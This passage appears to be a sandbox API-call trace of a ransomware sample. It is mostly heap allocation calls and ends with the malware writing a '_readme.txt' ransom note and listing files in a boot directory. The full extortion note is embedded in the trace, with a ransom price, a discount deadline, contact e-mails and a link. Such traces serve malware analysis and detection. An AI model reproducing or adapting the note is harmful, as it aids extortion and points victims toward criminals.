lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.561] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.561] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.562] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.563] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.563] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.564] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.565] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.565] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.565] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.565] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.565] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.565] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.565] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.565] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.565] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.565] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.565] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.565] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.565] PathFindFileNameW (pszPath="C:\\Boot\\el-GR\\") returned="el-GR\\" [0165.565] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.565] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.565] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.565] PathFindFileNameW (pszPath="") returned="" [0165.565] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.566] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.566] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.566] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.566] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.566] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.566] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.566] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.566] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x81c) returned 0x3b19ec8 [0165.566] PathAppendW (in: pszPath="C:\\Boot\\el-GR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 1 [0165.566] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.566] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.566] PathFileExistsW (pszPath="C:\\Boot\\el-GR\\_readme.txt") returned 0 [0165.566] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.567] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.567] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.567] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.567] CreateFileW (lpFileName="C:\\Boot\\el-GR\\_readme.txt" (normalized: "c:\\boot\\el-gr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.567] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.567] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.567] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.567] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.567] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.567] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.567] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.567] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.567] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.567] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.568] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 